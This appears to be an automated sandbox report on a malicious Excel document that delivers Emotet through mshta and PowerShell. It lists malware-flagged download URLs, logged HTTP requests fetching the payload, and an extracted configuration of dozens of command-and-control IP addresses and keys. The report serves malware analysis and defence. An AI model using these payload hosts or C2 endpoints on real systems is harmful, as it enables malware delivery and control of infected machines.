                            Source: http://91.240.118.168/zqqw/zaas/fe.htmlW59woAvira URL Cloud: Label: malware
                            Source: http://praachichemfood.com/public_html/SWmteCWBUkA89/Avira URL Cloud: Label: malware
                            Source: https://trochoi80club.com/wp-content/6shnRU/Avira URL Cloud: Label: malware
                            Source: http://www.praachichemfood.comAvira URL Cloud: Label: malware
                            Source: https://www.yepproject.org/wp-inAvira URL Cloud: Label: malware
                            Source: http://www.praachichemfood.com/wp-content/themes/brooklyn/js/ut-scriptlibrary.min.js?ver=4.9.7.2Avira URL Cloud: Label: malware
                            Source: http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.core.plugins.min.css?ver=5.9Avira URL Cloud: Label: malware
                            Source: http://praachichemfood.com/publiAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zqqw/zaas/Avira URL Cloud: Label: malware
                            Source: http://estiloindustria.com.br/wp-content/49cRLeDYqr6uVF7i/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zqqw/zaas/fe.pngAvira URL Cloud: Label: malware
                            Source: http://estiloindustria.com.br/wpAvira URL Cloud: Label: malware
                            Source: https://dtmconsulting.caAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zqqw/zaas/fe.pngPE3Avira URL Cloud: Label: malware
                            Source: https://worldaviationhub.com/wp-Avira URL Cloud: Label: malware
                            Source: https://worldaviationhub.com/wp-includes/Lik/PE3Avira URL Cloud: Label: malware
                            Source: https://dtmconsulting.ca/wp-includes/dkCFwyE/PE3Avira URL Cloud: Label: malware
                            Source: http://www.praachichemfood.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=6.5Avira URL Cloud: Label: malware
                            Source: https://www.praachichemfood.com/feed/Avira URL Cloud: Label: malware
                            Source: http://www.praachichemfood.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.4Avira URL Cloud: Label: malware
                            Source: https://futurelube.com/wp-admin/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zqqw/zaas/fe.htmlE59emAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zqqw/zaas/fe.htmlAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zqqw/zaas/fe.htmlELAvira URL Cloud: Label: malware
                            Source: https://worldaviationhub.com/wp-includes/Lik/Avira URL Cloud: Label: malware
                            Source: http://www.praachichemfood.com/xmlrpc.phpAvira URL Cloud: Label: malware
                            Source: http://www.praachichemfood.com/wp-content/plugins/ut-shortcodes/js/plugins/modernizr/modernizr.min.jAvira URL Cloud: Label: malware
                            Source: https://futurelube.com/wp-admin/6GLpl4ehsdCBX3z/Avira URL Cloud: Label: malware
                            Source: http://www.praachichemfood.com/wp-content/plugins/mystickyelements/css/mystickyelements-front.min.csAvira URL Cloud: Label: malware
                            Source: https://trochoi80club.com/wp-content/6shnRU/PE3Avira URL Cloud: Label: malware
                            Source: https://mortgageadviser.directory/xw8ok/icCYdBSpbFrf5s/Avira URL Cloud: Label: malware
                            Source: https://trochoi80club.com/wp-conAvira URL Cloud: Label: malware
                            Source: http://www.praachichemfood.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2Avira URL Cloud: Label: malware
                            Source: http://bakultante.com/tee5oeot/Q/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zqqw/zaas/fe.htmlP41ylAvira URL Cloud: Label: malware
                            Source: https://lodev7.com/wp-content/dpwjiJivrpgO1F2/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zqqw/zaas/fe.htmlNAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zqqw/zaas/fe.htmlWinSta0Avira URL Cloud: Label: malware
                            Source: http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.core.fonts.min.css?ver=5.9Avira URL Cloud: Label: malware
                            Source: http://www.praachichemfood.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0Avira URL Cloud: Label: malware
                            Source: https://futurelube.com/wp-admin/6GLpl4ehsdCBX3z/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zqqw/zaas/fe.htmlBAvira URL Cloud: Label: malware
                            Source: https://haileywells.com/cgi-bin/KJUOaq/Avira URL Cloud: Label: malware
                            Source: https://www.yepproject.org/wp-includes/lC45zFsHmmsMDElKT/Avira URL Cloud: Label: malware
                            Source: http://estiloindustria.com.br/wp-content/49cRLeDYqr6uVF7i/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zqqw/zaas/fe.htmlPAvira URL Cloud: Label: malware
                            Source: https://haileywells.com/cgi-bin/Avira URL Cloud: Label: malware
                            Source: http://www.praachichemfood.com/wp-includes/wlwmanifest.xmlAvira URL Cloud: Label: malware
                            Source: https://www.praachichemfood.com/comments/feed/Avira URL Cloud: Label: malware
                            Source: http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-144.pngAvira URL Cloud: Label: malware
                            Source: https://dtmconsulting.ca/wp-inclAvira URL Cloud: Label: malware
                            Source: http://www.praachichemfood.com/wp-content/themes/brooklyn/style.css?ver=4.9.7.2Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zqqw/zaas/fe.htmlHEAP_SIGNATURE4Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zqqw/zaas/fe.htmlmshtaAvira URL Cloud: Label: malware
                            Source: http://bakultante.com/tee5oeot/Q/Avira URL Cloud: Label: malware
                            Source: https://www.yepproject.org/wp-includes/lC45zFsHmmsMDElKT/PE3Avira URL Cloud: Label: malware
                            Source: https://www.praachichemfood.com/xmlrpc.php?rsdAvira URL Cloud: Label: malware
                            Source: https://onewaymedia.ro/wp-includes/k/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zqqw/zaas/fe.html.0Avira URL Cloud: Label: malware
                            Source: https://mortgageadviser.directory/xw8ok/icCYdBSpbFrf5s/PE3Avira URL Cloud: Label: malware
                            Source: http://praachichemfood.comAvira URL Cloud: Label: malware
                            Source: http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.shortcode.min.css?ver=5.9Avira URL Cloud: Label: malware
                            Source: http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.vc.shortcodes.min.css?ver=5.9Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zqqw/zaas/fe.htmlhttp://91.240.118.168/zqqw/zaas/fe.htmlAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168URL Reputation: Label: malware
                            Source: https://lodev7.com/wp-content/dpwjiJivrpgO1F2/PE3Avira URL Cloud: Label: malware
                            Source: http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-72.pngAvira URL Cloud: Label: malware
                            Source: http://www.praachichemfood.com/wp-content/plugins/mystickyelements/css/font-awesome.min.css?ver=2.0.Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zqqw/zaas/fe.htmlfunctionAvira URL Cloud: Label: malware
                            Found malware configuration
                            Source: 10.2.rundll32.exe.140000.0.raw.unpackMalware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
                            Multi AV Scanner detection for submitted file
                            Source: imedpub_2.xlsReversingLabs: Detection: 27%
                            Machine Learning detection for dropped file
                            Source: C:\ProgramData\QWER.dllJoe Sandbox ML: detected
                            Source: unknownHTTPS traffic detected: 162.241.211.118:443 -> 192.168.2.22:49169 version: TLS 1.0
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdbG source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854

                            Software Vulnerabilities

                            barindex
                            Document exploit detected (process start blacklist hit)
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
                            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 91.240.118.168:80
                            Source: global trafficDNS query: name: praachichemfood.com
                            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 162.241.211.118:443

                            Networking

                            barindex
                            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                            Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.168:80
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorIPs: 160.16.102.168:80
                            Source: Malware configuration extractorIPs: 131.100.24.231:80
                            Source: Malware configuration extractorIPs: 200.17.134.35:7080
                            Source: Malware configuration extractorIPs: 207.38.84.195:8080
                            Source: Malware configuration extractorIPs: 212.237.56.116:7080
                            Source: Malware configuration extractorIPs: 58.227.42.236:80
                            Source: Malware configuration extractorIPs: 104.251.214.46:8080
                            Source: Malware configuration extractorIPs: 158.69.222.101:443
                            Source: Malware configuration extractorIPs: 192.254.71.210:443
                            Source: Malware configuration extractorIPs: 46.55.222.11:443
                            Source: Malware configuration extractorIPs: 45.118.135.203:7080
                            Source: Malware configuration extractorIPs: 107.182.225.142:8080
                            Source: Malware configuration extractorIPs: 103.75.201.2:443
                            Source: Malware configuration extractorIPs: 104.168.155.129:8080
                            Source: Malware configuration extractorIPs: 195.154.133.20:443
                            Source: Malware configuration extractorIPs: 159.8.59.82:8080
                            Source: Malware configuration extractorIPs: 110.232.117.186:8080
                            Source: Malware configuration extractorIPs: 45.142.114.231:8080
                            Source: Malware configuration extractorIPs: 41.76.108.46:8080
                            Source: Malware configuration extractorIPs: 203.114.109.124:443
                            Source: Malware configuration extractorIPs: 50.116.54.215:443
                            Source: Malware configuration extractorIPs: 209.59.138.75:7080
                            Source: Malware configuration extractorIPs: 185.157.82.211:8080
                            Source: Malware configuration extractorIPs: 164.68.99.3:8080
                            Source: Malware configuration extractorIPs: 162.214.50.39:7080
                            Source: Malware configuration extractorIPs: 138.185.72.26:8080
                            Source: Malware configuration extractorIPs: 178.63.25.185:443
                            Source: Malware configuration extractorIPs: 51.15.4.22:443
                            Source: Malware configuration extractorIPs: 81.0.236.90:443
                            Source: Malware configuration extractorIPs: 216.158.226.206:443
                            Source: Malware configuration extractorIPs: 45.176.232.124:443
                            Source: Malware configuration extractorIPs: 162.243.175.63:443
                            Source: Malware configuration extractorIPs: 212.237.17.99:8080
                            Source: Malware configuration extractorIPs: 45.118.115.99:8080
                            Source: Malware configuration extractorIPs: 129.232.188.93:443
                            Source: Malware configuration extractorIPs: 173.214.173.220:8080
                            Source: Malware configuration extractorIPs: 178.79.147.66:8080
                            Source: Malware configuration extractorIPs: 176.104.106.96:8080
                            Source: Malware configuration extractorIPs: 51.38.71.0:443
                            Source: Malware configuration extractorIPs: 173.212.193.249:8080
                            Source: Malware configuration extractorIPs: 217.182.143.207:443
                            Source: Malware configuration extractorIPs: 212.24.98.99:8080
                            Source: Malware configuration extractorIPs: 159.89.230.105:443
                            Source: Malware configuration extractorIPs: 79.172.212.216:8080
                            Source: Malware configuration extractorIPs: 212.237.5.209:443
                            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                            Source: global trafficHTTP traffic detected: GET /wp-includes/dkCFwyE/ HTTP/1.1Host: dtmconsulting.caConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /zqqw/zaas/fe.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /public_html/SWmteCWBUkA89/ HTTP/1.1Host: praachichemfood.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /public_html/SWmteCWBUkA89/ HTTP/1.1Host: www.praachichemfood.comConnection: Keep-Alive
                            Source: unknownHTTPS traffic detected: 162.241.211.118:443 -> 192.168.2.22:49169 version: TLS 1.0
                            Source: global trafficHTTP traffic detected: GET /zqqw/zaas/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
                            Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
                            Source: Joe Sandbox ViewASN Name: S-NET-ASPL S-NET-ASPL
                            Source: Joe Sandbox ViewIP Address: 195.154.133.20 195.154.133.20
                            Source: Joe Sandbox ViewIP Address: 185.157.82.211 185.157.82.211
                            Source: unknownNetwork traffic detected: IP country count 22
                            Source: powershell.exe, 00000006.00000002.679858530.000000000352E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.11
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.679858530.000000000352E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168
                            Source: powershell.exe, 00000006.00000002.679858530.000000000352E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zqqw/zaas/
                            Source: mshta.exe, 00000004.00000002.440943084.0000000000336000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.441121111.000000000051C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.html
                            Source: mshta.exe, 00000004.00000002.441392938.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.html.0
                            Source: imedpub_2.xls.0.drString found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlB
                            Source: mshta.exe, 00000004.00000002.441078405.00000000004CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlE59em
                            Source: mshta.exe, 00000004.00000002.441392938.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlEL
                            Source: mshta.exe, 00000004.00000002.440901848.0000000000190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlHEAP_SIGNATURE4
                            Source: mshta.exe, 00000004.00000002.441078405.00000000004CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlN
                            Source: mshta.exe, 00000004.00000002.441078405.00000000004CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlP
                            Source: mshta.exe, 00000004.00000003.419347638.00000000004FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlP41yl
                            Source: mshta.exe, 00000004.00000002.441061967.0000000000490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlW59wo
                            Source: mshta.exe, 00000004.00000002.441061967.0000000000490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlWinSta0
                            Source: mshta.exe, 00000004.00000003.421233616.0000000001F8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlfunction
                            Source: mshta.exe, 00000004.00000003.421019651.0000000001F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlhttp://91.240.118.168/zqqw/zaas/fe.html
                            Source: mshta.exe, 00000004.00000002.441061967.0000000000490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlmshta
                            Source: powershell.exe, 00000006.00000002.679858530.000000000352E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.png
                            Source: powershell.exe, 00000006.00000002.679858530.000000000352E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.pngPE3
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bakultante.com/tee5oeot/Q
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bakultante.com/tee5oeot/Q/
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bakultante.com/tee5oeot/Q/PE3
                            Source: powershell.exe, 00000006.00000002.675532532.0000000002A47000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.675478649.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                            Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                            Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                            Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                            Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                            Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://estiloindustria.com.br/wp
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://estiloindustria.com.br/wp-content/49cRLeDYqr6uVF7i/
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://estiloindustria.com.br/wp-content/49cRLeDYqr6uVF7i/PE3
                            Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                            Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                            Source: powershell.exe, 00000006.00000002.675532532.0000000002A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                            Source: powershell.exe, 00000006.00000002.675532532.0000000002A47000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.675478649.0000000002A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                            Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                            Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                            Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://praachichemfood.com
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://praachichemfood.com/publi
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://praachichemfood.com/public_html/SWmteCWBUkA89/
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://praachichemfood.com/public_html/SWmteCWBUkA89/PE3
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-114.png
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-144.png
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-32.png
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-57.png
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-72.png
                            Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                            Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                            Source: powershell.exe, 00000006.00000002.674855596.000000000013E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                            Source: powershell.exe, 00000006.00000002.674855596.000000000013E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.praachichemfood.com
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.praachichemfood.com/public_html/SWmteCWBUkA89/
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.praachichemfood.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.4
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.praachichemfood.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=6.5
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.praachichemfood.com/wp-content/plugins/mystickyelements/css/font-awesome.min.css?ver=2.0.
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.praachichemfood.com/wp-content/plugins/mystickyelements/css/mystickyelements-front.min.cs
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.praachichemfood.com/wp-content/plugins/ut-shortcodes/js/plugins/modernizr/modernizr.min.j
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.core.fonts.min.css?ver=5.9
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.core.plugins.min.css?ver=5.9
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.shortcode.min.css?ver=5.9
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.theme.min.css?ver=4.9.7.2
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.vc.shortcodes.min.css?ver=5.9
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.praachichemfood.com/wp-content/themes/brooklyn/js/ut-scriptlibrary.min.js?ver=4.9.7.2
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.praachichemfood.com/wp-content/themes/brooklyn/style.css?ver=4.9.7.2
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.praachichemfood.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.praachichemfood.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
